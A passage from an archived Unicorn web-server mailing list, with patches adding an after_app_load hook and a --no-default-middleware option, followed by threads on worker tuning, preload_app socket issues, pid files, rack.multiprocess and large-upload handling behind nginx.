     :check_client_connection => false,
@@ -171,6 +174,13 @@ class Unicorn::Configurator
     set_hook(:before_exec, block_given? ? block : args[0], 1)
   end

+  # sets the after_app_load hook to a given Proc object.  This
+  # Proc object will be called by the master process right
+  # after application loaded.
+  def after_app_load(*args, &block)
+    set_hook(:after_app_load, block_given? ? block : args[0], 1)
+  end
+
   # sets the timeout of worker processes to +seconds+.  Workers
   # handling the request/app.call/response cycle taking longer than
   # this time period will be forcibly killed (via SIGKILL).  This
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index aa98aeb..a3b30ee 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -14,6 +14,7 @@ class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :request, :timeout, :worker_processes,
                 :before_fork, :after_fork, :before_exec,
+                :after_app_load,
                 :listener_opts, :preload_app,
                 :reexec_pid, :orig_app, :init_listeners,
                 :master_pid, :config, :ready_pipe, :user
@@ -716,6 +717,7 @@ class Unicorn::HttpServer
         Gem.refresh
       end
       self.app = app.call
+      config.after_app_load.call(self)
     end
   end






And --no-default-middleware
https://github.com/godfat/unicorn/pull/3

commit e3575db2a36e3ca2acda18bfee97bf95609a9860
Author: Lin Jen-Shin <godfat@godfat.org>
Date:   Fri Jan 25 18:38:52 2013 +0800

    Add -N or --no-default-middleware option.

    This would prevent Unicorn from adding default middleware,
    as if RACK_ENV is always none. (not development nor deployment)

    This should also apply to `rainbows' and `zbatery'.

diff --git a/bin/unicorn b/bin/unicorn
index 9962b58..415d164 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -58,6 +58,11 @@ op = OptionParser.new("", 24, '  ') do |opts|
     ENV["RACK_ENV"] = e
   end

+  opts.on("-N", "--no-default-middleware",
+          "no default middleware even if RACK_ENV is development") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
   opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
     rackup_opts[:daemonize] = !!d
   end
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index d96ff91..f0ceffe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -49,6 +49,8 @@ module Unicorn

       pp({ :inner_app => inner_app }) if $DEBUG

+      return inner_app if op[:no_default_middleware]
+
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
       # and Zbatery both do.  Users accustomed to the Rack::Server default
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 2%]

* Re: preload_app = true causing - ActiveModel::MissingAttributeError: missing attribute: some_attr
  @ 2013-01-21  7:55  4%       ` Avner Cohen
  0 siblings, 0 replies; 200+ results
From: Avner Cohen @ 2013-01-21  7:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Thanks Eric, I'll use this to explore the issue.

I suspect the issue is indeed around sockets, I found a reply from you
from a while back that seems to point on memcache as another thing I
need to manage at the worker level:
http://rubyforge.org/pipermail/mongrel-unicorn/2010-January/000309.html

That being said, I'm extremely surprised there is no published unicorn
startup scripts that consider the common use case of a deployment
stack that includes:
Rails + Active Record
Redis
Memcache

I'll post my final script once I conclude the investigation.

Best Regards,
Avner Cohen

On Sun, Jan 20, 2013 at 11:17 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Avner Cohen <avner.cohen@fiverr.com> wrote:
>> Eric,
>> Thanks for the quick reply, and aplogies for not providing full info.
>> I do have these set up, here is my full configuration:
>>
>> # -*- encoding : utf-8 -*-
>> worker_processes 4
>> working_directory "."
>> listen 3000
>> timeout 120
>>
>> preload_app true
>>
>> before_fork do |server, worker|
>>   defined?(ActiveRecord::Base) and ActiveRecord::Base.connection.disconnect!
>> end
>>
>>
>> after_fork do |server, worker|
>>   defined?(ActiveRecord::Base) and ActiveRecord::Base.establish_connection
>> end
>
> Interesting.  I haven't kept up with changes in Rails over the
> past few years.  Hopefully somebody else on the list, has...
>
> Which database and adapter are you using?
>
> Do you have anything else that opens a socket at application startup?
> (e.g. memcache, redis, ..., especially anything that would interact
> with ActiveRecord/Model)
>
> Can you try just using one worker_process + preload_app=true and
> doing "lsof -p" on both the PID of the master and single worker
> to show open sockets (and any other FDs which may be inadvertantly
> shared)?
>
> The only stream socket which should be shared are the listeners.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Number of worker processes on hyperthreaded processor
  2012-11-19 11:23  4% ` Eric Wong
@ 2013-01-19 22:57  0%   ` Jérémy Lecour
  0 siblings, 0 replies; 200+ results
From: Jérémy Lecour @ 2013-01-19 22:57 UTC (permalink / raw)
  To: unicorn list

2012/11/19 Eric Wong <normalperson@yhbt.net>:
> Andrew Stewart <boss@airbladesoftware.com> wrote:
>> Good morning,
>>
>> The tuning page says worker_processes should be at least the number of
>> CPU cores on a dedicated server.  In the case of hyper-threading,
>> should this be the number of cores or the number of threads?
>>
>> For example the Intel Core i7-2600 Quadcore[1] has 4 cores and 8
>> threads.  Would I start my worker_processes at 4 or 8?
>
> I'd start with the number of threads, since (AFAIK) your CPU implements
> HT well (unlike the P4 family).  Modern OSes multitask well, so more
> worker processes will always work until it bumps into another limit
> (e.g. memory usage, DB connections, disk contention, ...)

Hi (in plain text this time, sorry),

I have a follow up question about this.

What about having a few different unicorns (1 for each Ruby/Rails app)
on a singe server ; "at least the number of CPU cores" should count
the total number of children processes, or only per app ?

To be extremely clear ; if I have 2 quad-core CPUS with HT (eg. 16
cores), can I have 16 unicorn workers per app, or total ?

Thanks


PS : I've had my first unicorns in production for a few days, and I'm
very happy about this wonderful piece of software. Thanks for
making/maintaining it.


--
Jérémy Lecour :
http://jeremy.wordpress.com - http://twitter.com/jlecour
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Fwd: Issue starting unicorn with non-ActiveRecord Rails app
  @ 2012-12-05  7:45  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-12-05  7:45 UTC (permalink / raw)
  To: unicorn list

Peter Hall <peter.hall@localstars.com> wrote:
> Hi,
> 
> I'm trying to use unicorn in a test deployment of a Rails app that
> uses Mongoid, so Activerecord isn't included in the app. When I start
> unicorn through Capistrano though, the stderr log fills up endlessly
> with identical ActiveRecord-related errors:
> 
> I, [2012-12-05T04:19:25.375952 #5096]  INFO -- : Refreshing Gem list
> I, [2012-12-05T04:19:32.941249 #5096]  INFO -- : listening on
> addr=/var/www/webapps/fugu-cp/shared/pids/unicorn.sock fd=11
> I, [2012-12-05T04:19:32.990825 #5096]  INFO -- : master process ready
> E, [2012-12-05T04:19:33.108183 #5110] ERROR -- : uninitialized
> constant ActiveRecord (NameError)

Hi Peter, this doesn't seem like an issue specific to unicorn...

Can you reproduce this issue using another server, perhaps:

  rackup -s webrick -E #{rails_env}

?

<snip>

> This repeats until I kill Unicorn.
> 
> If you're curious, the way I'm starting Unicorn in the deploy file is
> as follows:

Which version of Rails is this?   Folks more familiar with modern Rails
than myself should be able to help given more information.  (Maybe
asking on a Rails-oriented list can help, too).

I do remember it was possible to disable parts of Rails back in the day.
Most of my Rails knowledge is stuck in the Rails 1.x-era, though...

> set :unicorn_rails, "#{deploy_to}/shared/bundle/ruby/1.9.1/bin/unicorn_rails"
> run "cd #{latest_release} && bundle exec \"#{unicorn_rails} -c
> #{deploy_to}/current/config/unicorn.rb -D -E #{rails_env}\""

Probably unrelated to the issue at hand, but "unicorn" is
preferred if you're on Rails >=3.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: pid file deleted briefly when doing hot restart
  @ 2012-11-26  0:43  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-11-26  0:43 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> What follows are all the write actions related to unicorn pid file when
> doing a hot restart. Seems like a bug to me that unicorn is deleting the
> pid file before writing the new file. Is there a reason for it? It seems
> to go against that rename that aims for an atomic replace that would
> always ensure the pid file is there.

Unfortunately, pid files are inherently racy.  However, I
seem to recall a pid file not existing for a brief moment was needed
to allow some nginx-based scripts to work.

I think unicorn differs a bit from nginx here:

nginx uses rename() to clear the way for a new pid file.  Like unicorn,
this still leaves a window where no pid file exists.

Also, nginx does not create a randomly named pid file before renaming
it, so there's a possibility another process can read an existing, but
zero-byte file.  unicorn avoids this, if a pid file exists, it has a pid
inside it.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Number of worker processes on hyperthreaded processor
  @ 2012-11-19 11:23  4% ` Eric Wong
  2013-01-19 22:57  0%   ` Jérémy Lecour
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-11-19 11:23 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> Good morning,
> 
> The tuning page says worker_processes should be at least the number of
> CPU cores on a dedicated server.  In the case of hyper-threading,
> should this be the number of cores or the number of threads?
> 
> For example the Intel Core i7-2600 Quadcore[1] has 4 cores and 8
> threads.  Would I start my worker_processes at 4 or 8?

I'd start with the number of threads, since (AFAIK) your CPU implements
HT well (unlike the P4 family).  Modern OSes multitask well, so more
worker processes will always work until it bumps into another limit
(e.g. memory usage, DB connections, disk contention, ...)

You may also want more workers to amortize GC/malloc/free costs anyways.

As always, testing for your particular app is required.

> Finally, would the same apply to Nginx worker processes?

I usually run fewer nginx workers since I don't configure much
CPU/memory-intensive logic in nginx.

However, if you're dealing with large uploads or large responses/static
files which cannot fit into memory, then I suggest having having enough
nginx workers to match (or exceed) your storage device count.

> [1] http://ark.intel.com/products/52213/Intel-Core-i7-2600-Processor-8M-Cache-up-to-3_80-GHz
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Combating nginx 499 HTTP responses during flash traffic scenario
  @ 2012-10-29 22:21  4%     ` Tom Burns
  0 siblings, 0 replies; 200+ results
From: Tom Burns @ 2012-10-29 22:21 UTC (permalink / raw)
  To: unicorn list

On Mon, Oct 29, 2012 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Maybe this gross hack can work for you guys.  It writes the first
> chunk of the HTTP response header out immediately after reading
> the request headers, and sends the rest once it gets the status...

Eric, thank you very much for your replies.  We'd debated this as an
alternate solution along with the two I mentioned in my original
email, and to be honest your tentative patch is cleaner than I'd had
expected this solution to look like :)

I will test this and respond back.

One of our goals in solving this problem would be to get any changes
merged back into unicorn master, and this looks like it would actually
lead to a cleaner result than having to select() on the socket.

Another side effect of the "select() in a middleware" solution was
going to be removing the NULL_IO optimization that sets rack.input to
a StringIO.

Cheers,
Tom
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Rack env rack.multiprocess true with single worker
  2012-10-18  6:33  4% Rack env rack.multiprocess true with single worker Petteri Räty
@ 2012-10-18  7:53  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-10-18  7:53 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> Hi,
> unicorn unconditionally sets rack.multiprocess to true in the Rack
> environment. The Rack spec [0] says the following about the variable:
> 
> "true if an equivalent application object may be simultaneously invoked
> by another process, false otherwise."
> 
> When unicorn is running with a single worker this does not hold so what
> do you think about setting the variable to false when only a single
> worker is configured? I want to use the variable to check if I can do a
> HTTP call back to the application (long story) but currently with
> unicorn and single worker this is not possible.

We cannot safely set rack.multiprocess=false.

Even if unicorn is started with a single worker, it is possible
to start more workers via SIGTTIN, and the first worker would
never see the change.


However, if you're certain nobody on your server will use SIGTTIN,
you can set the following anywhere in your unicorn config file:

	Unicorn::HttpRequest::DEFAULTS["rack.multiprocess"] = false

Changing the DEFAULTS constant has been and will remain supported
for as long as this project supports Rack 1.x (forever? :)


Since a single process deployment is a corner-case in production
deployments, I don't think it's worth the effort to jump through hoops
and set rack.multiprocess=false automatically.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Rack env rack.multiprocess true with single worker
@ 2012-10-18  6:33  4% Petteri Räty
  2012-10-18  7:53  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2012-10-18  6:33 UTC (permalink / raw)
  To: unicorn list

Hi,
unicorn unconditionally sets rack.multiprocess to true in the Rack
environment. The Rack spec [0] says the following about the variable:

"true if an equivalent application object may be simultaneously invoked
by another process, false otherwise."

When unicorn is running with a single worker this does not hold so what
do you think about setting the variable to false when only a single
worker is configured? I want to use the variable to check if I can do a
HTTP call back to the application (long story) but currently with
unicorn and single worker this is not possible.

Regards,
Petteri

[0] http://rack.rubyforge.org/doc/files/SPEC.html
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Is a client uploading a file a slow client from unicorn's point of view?
  2012-10-09  0:39  3% Is a client uploading a file a slow client from unicorn's point of view? Jimmy Soho
@ 2012-10-09  1:58  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-10-09  1:58 UTC (permalink / raw)
  To: unicorn list

Jimmy Soho <jimmy.soho@gmail.com> wrote:
> Hi All,
> 
> I was wondering what would happen when large files were uploaded to
> our system in parallel to endpoints that don't process file uploads.
> In particular I was wondering if we're vulnerable to a simple DoS
> attack.

nginx will protect you by buffering large requests to disk, so slow
requests are taken care of (of course you may still run out of disk
space)

> The setup I tested with was nginx v1.2.4 with upload module (v2.2.0)
> configured only for location /uploads with 2 unicorn (v4.3.1) workers
> with timeout 30 secs, all running on 1 small unix box.
> 
> In a few terminals I started this command 3 times in parallel:
> 
>    $ curl -i -F importer_input=@/Users/admin/largefile.tar.gz
> https://mywebserver.com/doesnotexist
> 
> In a browser I then tried to go a page that would be served by a unicorn worker.
> 
> My expectation was that I would not get to see the web page as all
> unicorn workers would be busy with receiving / saving the upload. As
> discussed in for example this article:
> http://stackoverflow.com/questions/9592664/unicorn-rails-large-uploads.
> Or as https://github.com/dwilkie/carrierwave_direct describes it:
> 
>   "Processing and saving file uploads are typically long running tasks
> and should be done in a background process."

That is true.  It's good to move slow jobs to background processes if
possible if the bottleneck is either:

a) your application processing
b) the storage destination of your app (e.g. cloud storage)

However, if your only bottleneck is client <-> your app, then nginx
will take care of that part for you.

> But I don't see this. The page is served just fine in my setup. The
> requests for the file uploads appear in the nginx access log at the
> same time the curl upload command eventually finishes minutes later
> client side, and then it's handed off to a unicorn/rack worker
> process, which quickly returns a 404 page not found. Response times of
> less than 50ms.
> 
> What am I missing here? I'm starting to wonder what's the use of the
> nginx upload module? My understanding was that it's use was to keep
> unicorn workers available as long as a file upload was in progress,
> but it seems that without that module it does the same thing.

I'm not familiar with the nginx upload module, but stock nginx will
already do full request buffering for you.  It looks like the nginx
upload module[1] is mostly meant for standalone apps written for
nginx, and not when nginx is used as a proxy for Rails app...

[1] http://www.grid.net.ru/nginx/upload.en.html

> Another question (more an nginx question though I guess): is there a
> way to kill an upload request as early as possible if the request is
> not made against known / accepted URI locations, instead of waiting
> for it to be completely uploaded to our system and/or waiting for it
> to reach the unicorn workers?

I'm not sure if nginx has this functionality, but unicorn lazily buffers
uploads.  So your upload will be fully read by nginx, but unicorn
will only read the uploaded request body if your application wants to
read it.

Unfortunately, I think most application frameworks (e.g. Rails) will
attempt to do all the multipart parsing up front.  To get around this,
you'll probably want some middleware along the following lines (and
placed in front of whichever part of your stack calls
Rack::Multipart.parse_multipart)

class BadUploadStopper
  def initialize(app)
    @app = app
  end

  def call(env)
    case env["REQUEST_METHOD"]
    when "POST", "PUT"
      case env["PATH_INFO"]
      when "/upload_allowed"
        @app.call(env) # forward to the app
      else
        # bad path, don't waste time with @app.call
        [ 403, {}, [ "Go away\n" ] ]
      end
    else
      @app.call(env)  # forward to the app
    end
  end
end

------------------- config.ru ---------------------
use BadUploadStopper
run YourApp.new
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Is a client uploading a file a slow client from unicorn's point of view?
@ 2012-10-09  0:39  3% Jimmy Soho
  2012-10-09  1:58  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jimmy Soho @ 2012-10-09  0:39 UTC (permalink / raw)
  To: mongrel-unicorn

Hi All,

I was wondering what would happen when large files were uploaded to
our system in parallel to endpoints that don't process file uploads.
In particular I was wondering if we're vulnerable to a simple DoS
attack.

The setup I tested with was nginx v1.2.4 with upload module (v2.2.0)
configured only for location /uploads with 2 unicorn (v4.3.1) workers
with timeout 30 secs, all running on 1 small unix box.

In a few terminals I started this command 3 times in parallel:

   $ curl -i -F importer_input=@/Users/admin/largefile.tar.gz
https://mywebserver.com/doesnotexist

In a browser I then tried to go a page that would be served by a unicorn worker.

My expectation was that I would not get to see the web page as all
unicorn workers would be busy with receiving / saving the upload. As
discussed in for example this article:
http://stackoverflow.com/questions/9592664/unicorn-rails-large-uploads.
Or as https://github.com/dwilkie/carrierwave_direct describes it:

  "Processing and saving file uploads are typically long running tasks
and should be done in a background process."

But I don't see this. The page is served just fine in my setup. The
requests for the file uploads appear in the nginx access log at the
same time the curl upload command eventually finishes minutes later
client side, and then it's handed off to a unicorn/rack worker
process, which quickly returns a 404 page not found. Response times of
less than 50ms.

What am I missing here? I'm starting to wonder what's the use of the
nginx upload module? My understanding was that it's use was to keep
unicorn workers available as long as a file upload was in progress,
but it seems that without that module it does the same thing.

Another question (more an nginx question though I guess): is there a
way to kill an upload request as early as possible if the request is
not made against known / accepted URI locations, instead of waiting
for it to be completely uploaded to our system and/or waiting for it
to reach the unicorn workers?


Cheers,
Jim
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Unused Unicorn processes
  2012-08-21  9:11  4%   ` Eric Wong
@ 2012-08-22 18:16  0%     ` Konstantin Gredeskoul
  0 siblings, 0 replies; 200+ results
From: Konstantin Gredeskoul @ 2012-08-22 18:16 UTC (permalink / raw)
  To: unicorn list

Thanks Eric!  Appreciate well thought out answers.

We are actually using Rainbows also, in an project where long
server-side HTTP calls are part of the application design and are
necessary, and it's working out really well.

Our main web app mostly spends it's time in CPU cycles serving web
pages (about 80% of the request time), and 20% in database operations.

Thanks again
K

On Tue, Aug 21, 2012 at 2:11 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Konstantin Gredeskoul <kig@wanelo.com> wrote:
>> Greetings!
>>
>> I have a question on optimal # of unicorn worker processes.
>>
>> We are running Unicorn 4.3.1 + Rails 3.2.6 (without threading), on
>> ruby 1.9.3-p194, hosted on SmartOS/Joyent.
>>
>> At the moment, unicorns are configured to start 30 worker processes. I
>> know this is a lot, and I am going to reduce this number. But in
>> trying to figure out what is a more appropriate number of workers to
>> run, I noticed something interesting that I couldn't explain.
>>
>> If I look at the process table on each machine (see top output below),
>> I notice that some unicorn processes are heavily used (and have
>> accumulated longer CPU times, as well as have grown their RAM usage
>> since boot time), but other processes (at the bottom of the top
>> output) appear to potentially not having been used at all.  There are
>> several processes with RSS size of 143Mb, which I believe is unicorn
>> size before it processes any requests.
>>
>> What I am gathering from this, is that only 16 unicorn processes are
>> actually processing requests, while the rest are just sitting there
>> idle.
>>
>> Is this expected behavior?
>
> It's not _unexpected_ if your load is low.  The OS scheduler does the
> load balancing itself as unicorn uses non-blocking accept().  The
> scheduler may choose busier processes because they're likely to be
> hotter in cache/memory.
>
> So you're probably getting better performance than if you had perfectly
> balanced traffic.
>
> Another possible explanation is something is killing some workers
> (timeout, or crash buts, check stderr logs to confirm).  But even in a
> situation where workers never die, it's perfectly normal to see workers
> that never/rarely serve traffic.
>
>> This Joyent SmartMachine can burst up to 8 cores. Given that our web
>> requests spend only 80% of their time in ruby, I figured we could run
>> 10 unicorn processes for maximum efficiency.  However seeing that 16
>> are actually used I am curious whether 16 is actually a better number.
>
> It depends what your app is waiting on.
>
> The only rule is your machine should not be swap thrashing under
> peak load.
>
> Extra workers won't be detrimental as long as you:
> 1) have enough memory
> 2) have enough backend resources (e.g DB connections)
>
> I know of deployments that run 30 processes/core because the app spends
> much time waiting on slow HTTP/DB requests[1]
>
> But if your app is completely bound by resources local to a machine (no
> external DB/HTTP/memcached/redis/etc requests), then a 1:1 worker:core
> (or even 1:1 worker:disk) relationship will work, too.
>
>
>
> [1] Arguably a multi-threaded or non-blocking server such as Rainbows!
> would be most efficient of machine resources if you're waiting on HTTP
> calls, but the developers decided human time was more important and
> did not want to worry about thread-safety.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying



-- 

Konstantin Gredeskoul
CTO :: Wanelo Inc
cell: (415) 265 1054
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Unused Unicorn processes
  @ 2012-08-21  9:11  4%   ` Eric Wong
  2012-08-22 18:16  0%     ` Konstantin Gredeskoul
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-08-21  9:11 UTC (permalink / raw)
  To: unicorn list

Konstantin Gredeskoul <kig@wanelo.com> wrote:
> Greetings!
> 
> I have a question on optimal # of unicorn worker processes.
> 
> We are running Unicorn 4.3.1 + Rails 3.2.6 (without threading), on
> ruby 1.9.3-p194, hosted on SmartOS/Joyent.
> 
> At the moment, unicorns are configured to start 30 worker processes. I
> know this is a lot, and I am going to reduce this number. But in
> trying to figure out what is a more appropriate number of workers to
> run, I noticed something interesting that I couldn't explain.
> 
> If I look at the process table on each machine (see top output below),
> I notice that some unicorn processes are heavily used (and have
> accumulated longer CPU times, as well as have grown their RAM usage
> since boot time), but other processes (at the bottom of the top
> output) appear to potentially not having been used at all.  There are
> several processes with RSS size of 143Mb, which I believe is unicorn
> size before it processes any requests.
> 
> What I am gathering from this, is that only 16 unicorn processes are
> actually processing requests, while the rest are just sitting there
> idle.
> 
> Is this expected behavior?

It's not _unexpected_ if your load is low.  The OS scheduler does the
load balancing itself as unicorn uses non-blocking accept().  The
scheduler may choose busier processes because they're likely to be
hotter in cache/memory.

So you're probably getting better performance than if you had perfectly
balanced traffic.

Another possible explanation is something is killing some workers
(timeout, or crash buts, check stderr logs to confirm).  But even in a
situation where workers never die, it's perfectly normal to see workers
that never/rarely serve traffic.

> This Joyent SmartMachine can burst up to 8 cores. Given that our web
> requests spend only 80% of their time in ruby, I figured we could run
> 10 unicorn processes for maximum efficiency.  However seeing that 16
> are actually used I am curious whether 16 is actually a better number.

It depends what your app is waiting on.

The only rule is your machine should not be swap thrashing under
peak load.

Extra workers won't be detrimental as long as you:
1) have enough memory
2) have enough backend resources (e.g DB connections)

I know of deployments that run 30 processes/core because the app spends
much time waiting on slow HTTP/DB requests[1]

But if your app is completely bound by resources local to a machine (no
external DB/HTTP/memcached/redis/etc requests), then a 1:1 worker:core
(or even 1:1 worker:disk) relationship will work, too.



[1] Arguably a multi-threaded or non-blocking server such as Rainbows!
would be most efficient of machine resources if you're waiting on HTTP
calls, but the developers decided human time was more important and
did not want to worry about thread-safety.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Address already in use
  @ 2012-06-25 23:57  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-06-25 23:57 UTC (permalink / raw)
  To: unicorn list

Manuel Palenciano Guerrero <mpalenciano@gmail.com> wrote:
> Hi,
> 
> First, thanks Eric, Jérémy and Aaron for replying. I really appreciate it.
> 
> Yes Eric, I can see the line... "inherited addr=/tmp/unicorn.app.sock fd=..."
> 
> here is the full log
> 
> -------------------------------------------------
> I, [2012-06-21T11:40:44.282224 #29212]  INFO -- : inherited addr=/tmp/unicorn.sublimma_staging.sock fd=3
> I, [2012-06-21T11:40:44.282480 #29212]  INFO -- : Refreshing Gem list
> master process ready
> worker=0 ready
> worker=1 ready
> reaped #<Process::Status: pid=28683,exited(0)> worker=0
> reaped #<Process::Status: pid=28684,exited(0)> worker=1
> master complete

Ugh, lack of formatting caused by Rails mucking with Logger is annoying.
Can you add the following to your unicorn config?

  Configurator::DEFAULTS[:logger].formatter = Logger::Formatter.new

(that's from unicorn.bogomips.org/FAQ.html)

> E, [2012-06-21T11:40:46.386486 #29401] ERROR -- : adding listener failed addr=/tmp/unicorn.sublimma_staging.sock (in use)

I'm curious if PID=29401 is a worker of pid 29212.  Or you're starting
another master somewhere...

> /var/www/sublimma/staging/shared/bundle/ruby/1.8/gems/unicorn-4.3.0/lib/unicorn/socket_helper.rb:140:in `initialize': Address already in use - /tmp/unicorn.sublimma_staging.sock (Errno::EADDRINUSE)
> -------------------------------------------------
> 
> my unicorn.rb: https://gist.github.com/2991110

Did you share the correct config?  Your config has:

  listen "/tmp/unicorn.app_production.sock"

But your config has: /tmp/unicorn.sublimma_staging.sock
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
  2012-04-27 19:51  0%     ` Eric Wong
  2012-04-27 19:53  0%       ` Eric Wong
@ 2012-04-27 20:30  0%       ` Matt Smith
  1 sibling, 0 replies; 200+ results
From: Matt Smith @ 2012-04-27 20:30 UTC (permalink / raw)
  To: Eric Wong; +Cc: mongrel-unicorn, George, Joel Nimety

On Fri, Apr 27, 2012 at 12:51 PM, Eric Wong <normalperson@yhbt.net> wrote:
> George <lists@SouthernOhio.net> wrote:
>> Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
>>
>> Will plug your patch in, but will have to figure out another option for
>> heroku deployment.
>
> Is this affecting your heroku deployment?  What OS/kernel version
> are you running?  From what Joel and Matt say, it could be more likely
> to trigger on *BSD-based systems.

I just tried on a 64-bit Ubuntu 11.10 (kernel 3.0.0-17-generic), ruby
1.9.3p0 (2011-10-30 revision 33570) [x86_64-linux]. No issue. Reloaded
a several pages, many times. No ENOTCONN. Not one. Same app.

Neither on ruby 1.9.3p194 (2012-04-20 revision 35410) [x86_64-linux].

BSD issue?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
       [not found]       ` <CACsAZRR=NP4O+EB0koAr0aeUwth=M+5aQnA8vtVLEXqFHd=jnA@mail.gmail.com>
@ 2012-04-27 19:51  0%     ` Eric Wong
  2012-04-27 19:53  0%       ` Eric Wong
  2012-04-27 20:30  0%       ` Matt Smith
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2012-04-27 19:51 UTC (permalink / raw)
  To: George; +Cc: mongrel-unicorn, Matt Smith, Joel Nimety

George <lists@SouthernOhio.net> wrote:
> Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
> 
> Will plug your patch in, but will have to figure out another option for
> heroku deployment.

Is this affecting your heroku deployment?  What OS/kernel version
are you running?  From what Joel and Matt say, it could be more likely
to trigger on *BSD-based systems.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
  2012-04-27 19:51  0%     ` Eric Wong
@ 2012-04-27 19:53  0%       ` Eric Wong
  2012-04-27 20:30  0%       ` Matt Smith
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2012-04-27 19:53 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: Joel Nimety, George, Matt Smith

Eric Wong <normalperson@yhbt.net> wrote:
> George <lists@SouthernOhio.net> wrote:
> > Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
> > 
> > Will plug your patch in, but will have to figure out another option for
> > heroku deployment.
> 
> Is this affecting your heroku deployment?  What OS/kernel version
> are you running?  From what Joel and Matt say, it could be more likely
> to trigger on *BSD-based systems.

Also, if you revert my previous patch, does this also prevent the error
from manifesting?

